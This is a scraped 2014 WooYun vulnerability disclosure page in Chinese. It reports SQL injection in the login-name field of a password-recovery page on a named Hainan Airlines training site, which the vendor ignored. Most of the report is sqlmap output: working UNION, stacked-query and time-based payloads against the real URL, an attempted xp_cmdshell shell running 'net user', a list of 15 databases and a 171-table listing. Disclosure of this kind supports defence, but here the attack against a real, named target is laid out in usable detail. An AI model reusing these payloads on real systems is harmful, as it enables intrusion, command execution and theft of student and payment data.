海航某站存在SQL注射漏洞 | wooyun-2014-079982| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079982

漏洞标题：海航某站存在SQL注射漏洞

漏洞作者：紫霞仙子

提交时间：2014-10-20 17:25

修复时间：2014-10-25 17:26

公开时间：2014-10-25 17:26

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-20：细节已通知厂商并且等待厂商处理中
2014-10-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

是个培训的、数据库还是很大的。

详细说明：

http://www.ltt-hna.com/Index/PasswordBack.aspx

post data:
"BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=name123&__E
VENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFg
ICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy%2bIm%2bjQs2uzX8
zqEyI%3d&__VIEWSTATEGENERATOR=8F891C3C"
参数： TextBox_LoginName

漏洞证明：

---
Place: POST
Parameter: TextBox_LoginName
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=b
cJsQZgQ' UNION ALL SELECT NULL,CHAR(113)+CHAR(115)+CHAR(108)+CHAR(103)+CHAR(113)
+CHAR(102)+CHAR(114)+CHAR(85)+CHAR(108)+CHAR(80)+CHAR(111)+CHAR(104)+CHAR(66)+CH
AR(80)+CHAR(79)+CHAR(113)+CHAR(105)+CHAR(114)+CHAR(115)+CHAR(113),NULL,NULL-- &_
_EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9k
FgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zq
EyI=&__VIEWSTATEGENERATOR=8F891C3C
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=b
cJsQZgQ'; WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&_
_VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPd
XRwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zqEyI=&__VIEWSTATEGENERATOR=8F891C3C
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=b
cJsQZgQ' WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__
VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdX
RwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zqEyI=&__VIEWSTATEGENERATOR=8F891C3C
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[ERROR] unable to retrieve xp_cmdshell output  //无回显的cmdshell...
os-shell> net user
--------------------
available databases [15]:
[*] Ameco_App
[*] AmecoIII
[*] AMTMSys
[*] ASPState
[*] EGBeLMS5
[*] HaiHangTM_BugTracker
[*] master
[*] model
[*] msdb
[*] NewQhope01
[*] qhopecmsegb
[*] TeacherGarden
[*] TeacherLicense
[*] tempdb
[*] UtiTech
Database: EGBeLMS5
[171 tables]
+------------------------------+
| AccountConsume               |
| BankInterfaceConfig          |
| BankPayDeliver               |
| BankPayDeliver               |
| BaseInfoLoca                 |
| BranchSiteLesson             |
| CardMonyTransfer             |
| CardSale                     |
| CardsDistribute              |
| CatalogAssistant             |
| ChildSite                    |
| ClassStudent                 |
| Commpany                     |
| ContestInfo                  |
| ContestPaper                 |
| ContestRecord                |
| CorporationEducate           |
| CorporationType              |
| CreditHour                   |
| DBBckUp                      |
| DupName                      |
| ExamPaperAnswer              |
| ExamPaperAnswer              |
| ExamPaperAnswer              |
| ExamPaperList                |
| ExamPaperNew                 |
| ExamPaperOpinion             |
| ExamPaperOpinionTeacher      |
| ExamPaperPublishList         |
| ExamPaperPublishList         |
| ExamPaperPublishNew          |
| ExamPaperRuleNew             |
| ExamPaperRuleNew             |
| ExamPaperScore               |
| ExamQuestionDetailNew        |
| ExamQuestionDetailNew        |
| ExamQuestionDetailNew        |
| ExamQuestionList             |
| ExamQuestionNew              |
| ExamQuestionPlan             |
| ExtraCode                    |
| GetInvoice                   |
| HomeWorkAnswer               |
| HomeWorkAnswer               |
| HomeWorkList                 |
| HomeWorkOffLine              |
| HomeWorkOnline               |
| HomeWorkPublish              |
| HomeWorkScore                |
| InitScore                    |
| IsChecked                    |
| JSNewConfig                  |
| JSreNote                     |
| KeystoneGroup                |
| KeystoneLesson               |
| LecCatalog                   |
| LecINCatalog                 |
| LessonClass                  |
| LessonClass                  |
| LessonConsult                |
| LessonConsultType            |
| LessonGood                   |
| LessonGroupPopedom           |
| LessonLimitTimes             |
| LessonMessages               |
| LessonPlan                   |
| LessonServiceCatalog         |
| LogInfo                      |
| MailContent                  |
| Member                       |
| MessageGroup                 |
| MessageSend                  |
| ModuleInfo                   |
| MoneyCard                    |
| Note                         |
| NumOnline                    |
| OnLineInject                 |
| OneLecPopedom                |
| OnlineApplication            |
| OnlineReSearch               |
| OrderCompany                 |
| OrderCompany                 |
| OtherTrade                   |
| PKTable                      |
| Patriarchy                   |
| PopedomGroup                 |
| PopedomModule                |
| PostBankPay                  |
| QAnswer1                     |
| QAnswer1                     |
| QAnswerManage                |
| QuestionInfo                 |
| QuestionInfo                 |
| RS_CatalogInfo               |
| RS_ResourceDownloadInfo      |
| RS_ResourceInfo              |
| RS_ResourceType              |
| RS_SizeLimit                 |
| RecycleBin                   |
| Role                         |
| SCPopedom                    |
| SYS***                       |
| Schoo***                     |
| School****                   |
| SchoolNewsAppend             |
| SchoolNewsAppend             |
| SchoolServiceInfo            |
| SetGoodStuShow               |
| ShoppingCar                  |
| SiteLabel                    |
| SiteNewsType                 |
| StudentAccount               |
| StudentAccount               |
| StudentBag                   |
| StudentC***                  |
| StudentC****                 |
| StudentFullMoney             |
| StudentImportTemp            |
| StudentIntegral              |
| StudentPopedom               |
| StudentPosition              |
| StudentSelectedLesson        |
| StudyC***                    |
| StudyExpense                 |
| StudyProc                    |
| StudyRecord                  |
| SysBackupPath                |
| SysNewsDisConfig             |
| TBL_TypicalFAQ               |
| Tbl_BoardDataConfig          |
| Tbl_DataShowConfig_List      |
| Tbl_ExamExt                  |
| Tbl_ListDataWithImageConfig  |
| Tbl_SiteADs                  |
| Tbl_SiteLogo                 |
| Tbl_SsoUsers                 |
| Tbl_SysConfig                |
| Tbl_TestQuestionStore        |
| TeachCatalog                 |
| TeacherFunctionInfo          |
| TeacherFunctionInfo          |
| TeacherPayList               |
| TeacherPayStandard           |
| TeacherWageMake              |
| TutorshipTeacher             |
| V_ByChapter                  |
| V_ExamPaperCheckList         |
| V_ExamPaperCurrentScore      |
| V_ExamPaperStatistics        |
| V_ExamPublish                |
| V_ExamQuestionA              |
| V_ExamQuestionF              |
| V_ExamShow                   |
| V_ExamStatistics             |
| V_HomeWorkCheckList          |
| V_SubTeachCatalog            |
| dtproperties                 |
| hits                         |
| studentCatalog1              |
| studentCatalogDetail         |
| tbl_Exam_KnowLeadgeInfo      |
| tbl_RandomExamQuestionDetail |
| tbl_RandomExamQuestionDetail |
| tbl_ResourceCatalog          |
| tbl_ResourceDownloadInfo     |
| tbl_ResourceInfo             |
| tbl_ResourceSpaceLimit       |
| tbl_ResourceType             |
| tbl_Temp_ReferCmsToChildSite |
| tbl_studentExamPaper         |
| x                            |
+------------------------------+

修复方案：

这个。。。

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-10-25 17:26

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079982

漏洞标题：海航某站存在SQL注射漏洞

相关厂商：hnagroup.com

漏洞作者：紫霞仙子

提交时间：2014-10-20 17:25

修复时间：2014-10-25 17:26

公开时间：2014-10-25 17:26

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079982

漏洞标题：海航某站存在SQL注射漏洞

相关厂商：hnagroup.com

漏洞作者： 紫霞仙子

提交时间：2014-10-20 17:25

修复时间：2014-10-25 17:26

公开时间：2014-10-25 17:26

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-079982"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：紫霞仙子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源紫霞仙子@乌云